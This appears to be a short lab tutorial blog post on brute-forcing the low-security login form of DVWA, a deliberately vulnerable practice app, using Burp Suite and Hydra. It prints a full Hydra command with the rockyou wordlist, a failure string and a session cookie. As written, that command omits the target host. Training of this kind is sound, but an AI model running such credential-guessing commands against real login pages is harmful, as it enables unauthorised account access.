DVWA Brute Force (Hydra)

Today is a quick example on how to brute force a low security login form on the DVWA machine using Hydra

You will need

  • Kali Linux
  • Hydra
  • DVWA
  • Burp Suite
  • Wordlist

First we need to capture the Login request with Burp to get a Cookie and a response to see how the page works when responding to a “Failed Login”

Fire up Burp and capture the request

Screenshot from 2018-07-10 17-04-16

This is all we are going to need from burp it gives us the Parameter, the Url and the cookie for the attack

Next lets utilize Hydra open up a Terminal and type the following command (make sure url is correct) as it it case sensitive and you will get false positives from Hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get-form “/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:USername and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rf0uoeqqtio083hl4opmmq2j57”

execute the command and you will start seeing the response if you used the verbose mode -v once successful you will see the login information highlighted in green

That is it for Low Security!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s